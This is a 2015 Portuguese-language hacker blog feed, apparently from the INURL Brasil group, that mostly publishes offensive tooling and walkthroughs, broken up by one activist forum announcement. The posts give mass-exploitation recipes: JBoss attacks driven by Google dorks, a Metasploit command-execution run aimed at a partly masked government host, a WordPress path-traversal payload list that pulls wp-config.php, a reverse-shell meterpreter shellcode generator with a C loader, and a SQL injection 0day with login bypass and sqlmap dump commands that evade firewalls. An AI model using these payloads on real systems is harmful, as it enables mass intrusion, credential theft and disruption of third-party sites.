Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

sexta-feira, 19 de junho de 2015

JexBoss - Jboss Verify Tool - INURLBR Mass exploitation -

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner  All latches and test questions were withdrawn in order to be used in mass was added fução to save vulnerable sites.

Requirements
Python <= 2.7.x

Installation
To install the latest version of JexBoss, please use the following commands:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

#  [ + ] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
#  [ + ] Updates: https://github.com/joaomatosf/jexboss
#  [ + ] SCRIPT original: http://1337day.com/exploit/23507 - http://77.120.105.55/exploit/23507
#  [ + ] Free for distribution and modification, but the authorship should be preserved.

Features
The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.

The exploitation vectors are:

  1. /jmx-console - tested and working in JBoss versions 4, 5 and 6
  2. /web-console/Invoker- tested and working in JBoss versions 4
  3. /invoker/JMXInvokerServlet- tested and working in JBoss versions 4 and 5

The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner 
All latches and test questions were withdrawn in order to be used in mass was added function to save vulnerable sites.

Mass Exploration: 
To do this we use the scanner inurlbr
Modified script for mass exploitation: 
https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py 

DORKS SEARCH 

inurl:"jmx-console/HtmlAdaptor"
inurl:"/web-console/Invoker"
inurl:"/invoker/JMXInvokerServlet"

COMMAND INURLBR:
- single search.
--dork {YOU_DORK}

php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"

- search using dorks file 
- File example with dorks:
site:br inurl:"jmx-console/HtmlAdaptor"
site:uk inurl:"jmx-console/HtmlAdaptor"
site:in inurl:"jmx-console/HtmlAdaptor"
site:ru inurl:"jmx-console/HtmlAdaptor"
site:pe inurl:"jmx-console/HtmlAdaptor"
site:br  inurl:"/web-console/Invoker"
site:uk  inurl:"/web-console/Invoker"
site:ru  inurl:"/web-console/Invoker"
site:us  inurl:"/web-console/Invoker"
site:com  inurl:"/web-console/Invoker"
So on .....

Exemple-> File: dorks.txt
--dork-file {YOU_DORKFILE}
php inurlbr.php --dork-file 'dorks.txt' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"


- Using to capture the range of ips--range {IP_START,IP_END}

php inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"
- Range of ips random--range-rand {counter}

php inurlbr.php --range-rand '150' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"

Exemple OUTPUT:


JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.
  • MODULE METASPLOIT:auxiliary/admin/http/jboss_seam_exec
  • COMMAND SCANNER INURLBR:/inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6
  • DORK:site:.gov.br inurl:.seam  intitle:"JBoss Seam Debug"
Configuração:
  • CMD  - The command to execute.
  • RHOST - The target address
  • RPORT  - The target port
  • TARGETURI - Target URI
msf > use auxiliary/admin/http/jboss_seam_exec
msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br
msf auxiliary(jboss_seam_exec) > set RPORT 80
msf auxiliary(jboss_seam_exec) > set CMD reboot
msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam
msf auxiliary(jboss_seam_exec) > exploit

Output:
msf > use auxiliary/admin/http/jboss_seam_exec msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br msf auxiliary(jboss_seam_exec) > set RPORT 80 msf auxiliary(jboss_seam_exec) > set CMD reboot msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam msf auxiliary(jboss_seam_exec) > exploit

Resultado:

Resultado:

sexta-feira, 12 de junho de 2015

Internet Ungovernance Forum Brasil

<free> We are supporting </free>

Sem privacidade não há democracia! There is no democracy without privacy! No hay democracia sin privacidad! Il n'y a pas de démocratie sans la vie privée!  O Fórum de DESGOVERNANÇA da Internet é para todas as pessoas que exigem uma Internet livre, aberta e segura para o povo! Estaremos organizando o Fórum de Desgovernança da Internet em Novembro de 2015, para todas as pessoas que demandam por liberdade de expressão, transparência, privacidade e neutralidade de rede como pilares fundamentais da Internet. Nosso objetivo é falar sobre os verdadeiros e reais problemas da Internet, assim como sobre os meios através dos quais podemos resolvê-los, traçando um plano de ação. Nosso fórum será paralelo ao Fórum de Governança da Internet (IGF) 2015, que também será em João Pessoa. Partes interessadas de todo o mundo irão participar deste importante evento. Nós observamos que, no IGF, os mais urgentes problemas da Internet não recebem a devida atenção. Devido ao formato do evento, os principais perpetuadores de muitos dos problemas da internet, governos e corporações, terão uma representatividade no IGF que eles não merecem. Dadas essas circunstâncias, nós decidimos defender a Internet como nós a conhecemos e criar um espaço para dar voz a iniciativas da sociedade civil, ativistas e pessoas comuns, em um fórum paralelo. Para nós, as questões atuais mais fundamentais são a censura e liberdade de expressão; vigilância e privacidade; excessiva comercialização e super-monopólios; protecionismo, proibição e aproximação de uma governança conservadora. Além disso, vemos que todos esses problemas, relacionados e incorporados à Internet e suas infraestruturas digitais, não podem ser dissociados de seus contextos políticos, sociais e econômicos. Queremos reafirmar a Internet como uma base fundamental da nossa sociedade, cidade, educação, saúde, trabalho, meios de comunicação, comunicações, cultura e atividades de nosso cotidiano. Convidamos as pessoas interessadas em participar dessa iniciativa a resistir à visão de que os problemas da Internet são unicamente tecnológicos, sem o efeito de sua materialidade.

Sem privacidade não há democracia!
There is no democracy without privacy!
No hay democracia sin privacidad!
Il n'y a pas de démocratie sans la vie privée!


Ab0ut
Internet Ungovernance Forum Brasil is for those of us who demand free, secure, and open internet for all!

We're organizing the Internet Ungovernance Forum on November 2015, for everyone who demand that fundamental freedoms, openness, unity and net neutrality remain the building blocks of the Internet. Our objective is to talk about the real problems of the internet, how we can solve these and to chart a path for action.

Our forum will be in parallel to the Internet Governance Forum (IGF) 2015 which will also be held in João Pessoa in november. Interested parties all around the world will join and follow this important event. We see that at IGF the most urgent problems of the Internet do not get the right attention. Due to the "multi-stakeholderism" format, the main perpetrators of many of the Internet's problems, governments and corporations, are getting representation in IGF they don’t deserve. Given these circumstances, we decided to take initiative to defend the Internet as we know it and to create a parallel space to raise the voices of civil society initiatives, activists and common people.

For us, the most vital problems today are censorship and freedom of speech; surveillance and privacy; excessive commercialization and super-monopolies; protective, prohibitionist and conservative governance approaches; awful governance examples as in the case of Brasil and the list goes on. Further, we do not see any of these problems independent of the greater political, social and economic contexts in which the Internet and related digital infrastructures are embedded in.

We want to reclaim the Internet as a fundamental infrastructure of our societies, cities, education, health, work, media, communications, culture and everyday activities.

We call on our participants to resist seeing the problems of the Internet as only technological and void of its materiality


Inv1t3d

Invited JULIA REDA  German, member of the european parliament for the Pirate Party on Germany and vice president of the Greens / Europe Free Alliance. Amelia Andersdotter AMELIA ANDERSDOTTER  Swedish activist, youngest member of the European Parliament on history from 2011-2014 for the Piratpartiet. Fabiane Kravutschke FABIANE KRAVUTSCHKE  Activist for ecofeminism, transfeminism and for the animal rights. Prime Secretary of the Pirate Party on Brasil.
Supp0rter5

Supporters


PAGE OFICIAL: 

EVENTO FACEBOOK: 

quarta-feira, 10 de junho de 2015

Send Attack Web Forms - Tool

DESCRIPTION

The purpose of this tool is to be a Swiss army knife  for anyone who works with HTTP, so far it she is basic, bringing only some of the few features that want her to have, but we can already see in this tool:
  1. - Email Crawler in sites
  2. - Crawler forms on the page
  3. - Crawler links on web pages
  4. - Sending POST and GET
  5. - Support for USER-AGENT
  6. - Support for THREADS
  7. - Support for COOKIES
Developed by

Danilo Vaz - UNK
[email protected]
http://unk-br.blogspot.com
https://twitter.com/unknownantisec


REQUERIMENTS 
----------------------------------------------------------
  • Import:
  • threading
  • time
  • argparse
  • requests
  • json
  • re
  • BeautifulSoup
  • permission          Reading & Writing
  • User                root privilege, or is in the sudoers group
  • Operating system    LINUX
  • Python              2.7 
----------------------------------------------------------

INSTALL

git clone http://github.com/danilovazb/SAWEF

sudo apt-get install python-bs4 python-requests



HELP

usage: tool [-h] --url http://url.com/
[--user_agent '{"User-agent": "Mozilla/5.0 Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8 Gecko/20050511 Firefox/1.0.4"}"]
[--threads 10] [--data '{"data":"value","data1":"value"}']
[--qtd 5] [--method post|get]
[--referer '{"referer": "http://url.com"}']
[--response status_code|headers|encoding|html|json|form]
[--cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=direct|utmccn=direct|utmcmd=none"}']

optional arguments:
  -h, --help        show this help message and exit
  --url http://url.com/
                    URL to request
  --user_agent '{"User-agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}"
                    For a longer list, visit:
                    http://www.useragentstring.com/pages/useragentstring.php
  --threads 10      Threads
  --data '{"data":"value","data1":"value"}'
                    Data to be transmitted by post
  --qtd 5           Quantity requests
  --method post|get
                    Method sends requests
  --referer '{"referer": "http://url.com"}'
                    Referer
  --response status_code|headers|encoding|html|json|form
                    Status return
  --cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)"}'
                    Cookies from site
 

EXAMPLE

*Send 1 SMS anonymous to POST [in BR]:
----------------------------------------------------------
$:> python sawef.py --url "https://smsgenial.com.br/forms_teste/enviar.php" --data '{"celular":"(11) XXXX-XXXXX","mensagem":"Teste","Testar":"Enviar"}' --threads 10 --qtd 1 --user_agent '{"User-agent":"Mozilla/5.0 Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}'
*List Form attributes:

----------------------------------------------------------
$:> python sawef.py --url "https://smsgenial.com.br/ --method post --response form
 

 * Get email web pages
----------------------------------------------------------
 $:> python sawef.py --url "http://pastebin.com/ajaYnLYc" --response emails
[...]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
FOUND = 3065

* Get links on web pages

----------------------------------------------------------
$:> python sawef.py --url "http://terra.com.br" --response links
[...]
[+] LINK = http://uol.com.br/https://pagseguro.uol.com.br/vender
[+] LINK = http://www.uolhost.com.br/registro-de-dominio.html
[+] LINK = http://noticias.uol.com.br/arquivohome/
[+] LINK = http://noticias.uol.com.br/erratas/
[+] LINK = http://uol.com.br/#
[+] FOUND = 360


SCREENSHOT:
DESCRIPTION  The purpose of this tool is to be a Swiss army knife  for anyone who works with HTTP, so far it she is basic, bringing only some of the few features that want her to have, but we can already see in this tool:      - Email Crawler in sites     - Crawler forms on the page     - Crawler links on web pages     - Sending POST and GET     - Support for USER-AGENT     - Support for THREADS     - Support for COOKIES  Developed by

Download tool:
https://github.com/danilovazb/SAWEF


REf:
http://unk-br.blogspot.com.br/2015/06/send-attack-web-forms-tool.html

terça-feira, 9 de junho de 2015

WordPress Plugin 'WP Mobile Edition' LFI Vulnerability

Exploring wordpress plugin LFI using inurlbr in subprocess

Exploring wordpress plugin LFI using inurlbr in subprocess

Inurlbr Team
[+]=========== Assume NO ============[+]
 Liability and are not responsible
for any misuse or damage caused
 by this program!!
[+]==================================[+]

USAGE:

Make a file named payload .txt and put inside:
/wp-content/themes/mTheme-Unus/css/css.p­hp?files=../../../../wp-config.php

OTHER FAILURES(XPL's):

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php


EXPLOIT COMMAND:
php inurlbr.php --dork 'inurl:?fdx_switcher=mobile' -q [your favorite engines] -s scan.txt --get-file 'payload.txt' --sub-get --unique

Vídeo:



SCANNER INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

REF:
https://www.exploit-db.com/exploits/37244/
http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html

sexta-feira, 29 de maio de 2015

Injeção de shellcode na mémoria

#Shellcode [ CONEXÃO REVERSA ] #Memory


  Eae galera, jh00n aqui novamente :)

  Nesse post irei abordar o tema sobre injeção de uma shellcode na mémoria, mas antes de tudo teremos que gerar uma shellcode usando o msfpayload que está presente no framework Metasploit.

    

root@jh00n:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.19 LPORT=445 R | msfenconde -e x86/shikata_ga_nai -t c -a x64 -b "\x00\x0A\x00" -c 5




  Irei gerar a shellcode utilizando a payload (windows/meterpreter/reverse_tcp). Agora eu terei que definir o ip da máquina que ira se conectar, no parâmetro (LHOST) e a porta que irá também se conectar, no parâmetro (LPORT), e por último definirei o parâmetro (R) para o msfpayload me retornar a shellcode em (R)aw.


   #Msfencode



msfenconde -e x86/shikata_ga_nai -t c -a x64 -b "\x00\x0A\x00" -c 5



  O msfencode será utilizado para encodar a minha shellcode (x86/shikata_ga_nai) agora e vou definir o numéro de vezes que a minha shellcode ira ser codificado no parâmetro (-c 5) nesse caso defini para cinco. (-t) e também irei definir formato de saída"c".  A arquitetura que a shellcode vai utilizar é 64 bits(-a x64). Vou excluir alguns caracteres "inúteis" x00, x0A utilizando o parâmetro (-b)


#Compilando



  Utilizarei o Dev c++ para compilar o programa que ira executar a minha shellcode:


  Utilizarei o Dev c++ para compilar o programa que ira executar a minha shellcode:

  char code[] = "shellcode";
   int main(int argc, char **argv)
  {
   int (*func)();
   func = (int (*)()) code;
   (int)(*func)();
   }


#Aguardando Conexão

   

DEMO

segunda-feira, 25 de maio de 2015

Apresentação - Co0L BSidesSP v11 / Brazilian Arsenal - 24/05/2015

DIVULGAÇÃO TOOL INURLBR 2.1 + Conceitos de exploração em massa.

DIVULGAÇÃO TOOL INURLBR 2.1 + Conceitos de exploração em massa.


Mais uma vez tenho a grande satisfação de participar da conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) que é uma mini-conferência sobre segurança da informação organizada por profissionais de mercado com o apoio do Garoa Hacker Clube com o objetivo de promover a inovação, discussão e a troca de conhecimento, além de divulgar os valores positivos e inovadores da cultura hacker. 
Fiquei em uma divisão chamada Brazilian Arsenal, Brazilian Arsenal é um espaço para divulgar os projetos de ferramentas de segurança Open Source desenvolvidas por brasileiros, com objetivo de divulgar estas iniciativas, fomentar o uso destas ferramentas e atrair mais voluntários para estes projetos.
No início cada projeto tem um espaço de até 10 minutos para se apresentar (no ritmo de Lightning Talks). Em seguida, iremos realizar atividades mão na massa, a escolha do mantenedor de cada projeto, que pode incluir um installfest, um laboratório ou mesmo um "hackaton", aonde os presentes são convidados a desenvolver uma feature ou corrigir um bug do projeto.

Mais uma vez tenho a grande satisfação de participar da conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) que é uma mini-conferência sobre segurança da informação organizada por profissionais de mercado com o apoio do Garoa Hacker Clube com o objetivo de promover a inovação, discussão e a troca de conhecimento, além de divulgar os valores positivos e inovadores da cultura hacker.   Fiquei em uma divisão chamada Brazilian Arsenal, Brazilian Arsenal é um espaço para divulgar os projetos de ferramentas de segurança Open Source desenvolvidas por brasileiros, com objetivo de divulgar estas iniciativas, fomentar o uso destas ferramentas e atrair mais voluntários para estes projetos. No início cada projeto tem um espaço de até 10 minutos para se apresentar (no ritmo de Lightning Talks). Em seguida, iremos realizar atividades mão na massa, a escolha do mantenedor de cada projeto, que pode incluir um installfest, um laboratório ou mesmo um "hackaton", aonde os presentes são convidados a desenvolver uma feature ou corrigir um bug do projeto.Dentro desse tempo tentei passar um poucos sobre conceitos para exploração em massa de alvos, dentre eles expliquei sobre mini-exploit(defino da seguinte forma: É um conjunto de comandos que possibilita execução de varias rotinas, assim poupando tempo.) e novidades da ferramenta INURLBR 2.1.

[ + ] Grade da apresentação:
Titulo: INURLBR 2.1 - Mass Exploit
Conteúdo:
  • - Introdução básica da ferramenta.
  • - Explicação novidades código.
  • - Conceito mini-exploit.
  • - Criação de mini-exploit
  • - Mini-exploit(Shellshock);
  • - Exploração em massa mini-exploit(Shellshock);
  • - Mini-exploit(SQLMAP);
  • - Exploração em massa mini-exploit(SQLMAP);
  • - Modo Bot enviando resultados pro server IRC.
  • - Exploração Wordpress Arbitrary File Download.
  • - Uso de sub_processo otimizando tempo.
  • - perguntas.
  • - fim.
SLIDE APRESENTAÇÃO
Download INURLBR 2.1


domingo, 17 de maio de 2015

Exploit 0day CMS HB 1.5


0day - Exploit php explora SQL INJECTION via( GET/POST) em CMS brasileiro HB feito pela empresa "Agência HB Web e Cia".

0day - Exploit php explora SQL INJECTION via( GET/POST) em CMS brasileiro HB feito pela empresa "Agência HB Web e Cia".


[+] Discoverer Author: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: [email protected]
[*] Thanks M3t4tr0n

# SCRIPT by: [ I N U R L-B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA:http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil

Neither war between hackers, nor peace for the system.
------------------------------------------------------------------------------

[ + ] FAILURE REPORTED:
15/maio/2015

[ + ] Type:
ADMINISTRATIVE ACCESS PANEL

[ + ] Vendor:
http://www.hbwebecia.com.br/

[ + ] Version: 
HB 1.5

[ + ] Google Dork:
inurl:"base.php?pagina"

[ + ] FILE VULN:
/admin/logar.php

[ + ] POC:
(POST) http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar

[ + ] FILE VULN:
/base.php

[ + ] POC:
(GET) http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)

[ + ] Exploração SQLMAP output:
# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--

[ + ] USE SQLMAP:
./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'
--dbs --random-agent --level 3 --risk 2--proxy 'http://localhost:8118' 
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only 
--flush-session --batch

[ + ] EXECUTE: 
php xpl.php -t http://target.us

[ + ] FILE_OUTPUT :
HB.txt

PRINT OUTPUT:
[ + ] EXECUTE:  php xpl.php -t http://target.us

[ + ] Exploit: 
http://www.exploit4arab.net/exploits/1505 / http://pastebin.com/AY6sMthP

[ + ] EXPLOIT MASS USE SCANNER INURLBR:
php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'

PRINT OUTPUT:
[ + ] EXPLOIT MASS USE SCANNER INURLBR: php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt--command-all 'php xpl.php -t _TARGET_'  PRINT OUTPUT:

More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

quarta-feira, 13 de maio de 2015

Web India Solutions CMS 2015 - SQL Injection Vulnerability

VULNERABILIDADE SQLI EM CMS INDIANO  Web India Solutions CMS 2015


Our Website Designing and Development services include Website redesigning, creation of Responsive Websites, Website content updates,  E-commerce Website designing etc. You can contact us for all the website related services. We use HTML5, CSS3, JavaScript, Ajax, PHP,  WordPress and Joomla for Development and Content Management.  (Copy of the Vendor Homepage: http://www.webindiasolutions.com/ )
[ + ] References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1495

[ + ] Release Date:
2015-05-13
[ + ] Vulnerability Laboratory ID (VL-ID):
1495
[ + ] Common Vulnerability Scoring System:
8.3
[ + ] Product & Service Introduction:
Our Website Designing and Development services include Website redesigning, creation of Responsive Websites, Website content updates, 
E-commerce Website designing etc. You can contact us for all the website related services. We use HTML5, CSS3, JavaScript, Ajax, PHP, 
WordPress and Joomla for Development and Content Management.

(Copy of the Vendor Homepage: http://www.webindiasolutions.com/ )


[ + ] Abstract Advisory Information:
An independent vulnerability laboratory researcher discovered a remote sql injection web vulnerability in the official CMS Web India Solutions (2015 Q2).

[ + ] Vulnerability Disclosure Timeline:
2015-05-13: Public Disclosure (Vulnerability Laboratory)

[ + ] Discovery Status:
Published

[ + ] Affected Product(s):
Web India Solutions
Product: Content Management System 2015 Q2

[ + ] Exploitation Technique:
Remote

[ + ] Severity Level:
High

[ + ] Technical Details & Description:
Multiple remote sql injection vulnerabilities has been discovered in the official Content Management System Web India Solutions (2015 Q2).
The vulnerability allows remote attackers to execute own sql commands to compromise the web-applicaation or database management system.

The vulnerabilities are located in the id value of the `departments.php`,`offers.php` and `photogallery_view.php` files. Remote attackers are 
able to execute own sql commands by manipulation of the GET method request with the vulnerable id value. The request method to inject the 
command is GET and the issue is located on the application-side.

The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.3.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise.

Request Method(s):   GET
Vulnerable File(s):  departments.php, offers.php, photogallery_view.php
Vulnerable Parameter(s): id

[ + ] Proof of Concept (PoC):
The remote sql injection web vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce follow the provided information and steps below to continue.

[ + ] Dork(s):
intext:"Website Development Web India Solutions" +inurl:.php?id=  
intext:"Web India Solutions" & inurl:"php?id="
intext:"Website Development Web India Solutions" +inurl:.php?id=   intext:"Web India Solutions" & inurl:"php?id="
[ + ] PoC: Payload(s):
https://www.[SITE].com/anyinfectedfile.php?id=(ID)+XPL

[ + ] SQLMAP Payload(s):
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=34' AND 4678=4678#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: id=34' AND (SELECT * FROM (SELECT(SLEEP(5)))mQsU)#

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-4358' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a766a71,0x674c4e4756745179796a,0x7178767871),NULL,NULL,NULL,NULL#

[ + ] COMMAND(s) SQLMAP:
sqlmap -u http://www.site.com/filevuln.php?id=(ID)--dbs --tamper modsecurityzeroversioned.py --level 3 --risk 2 --random-agent --no-cast

sqlmap -u http://www.site.com/filevuln.php?id=(ID) -D [DB_NAME] --tables --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast

sqlmap -u http://www.site.com/filevuln.php?id=(ID) --dump -D [DB_NAME] -T cms_admin --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast

- OUTPUT PRINT SQLMAP:    
sqlmap -u http://www.site.com/filevuln.php?id=(ID)--dbs --tamper modsecurityzeroversioned.py --level 3 --risk 2 --random-agent --no-cast  sqlmap -u http://www.site.com/filevuln.php?id=(ID) -D [DB_NAME] --tables --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast  sqlmap -u http://www.site.com/filevuln.php?id=(ID) --dump -D [DB_NAME] -T cms_admin --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast


[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Web India Solutions" & inurl:"php?id="' -s sqli.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch --tamper modsecurityzeroversioned.py"

- OUTPUT PRINT INURLBR: 
[+] EXPLORING WITH MASS INURLBR: php inurlbr.php --dork 'intext:"Web India Solutions" & inurl:"php?id="' -s sqli.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch --tamper modsecurityzeroversioned.py" OUTPUT PRINT SQLMAP:


[+] DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR


[ + ] REF FONTE:
http://www.vulnerability-lab.com/get_content.php?id=1495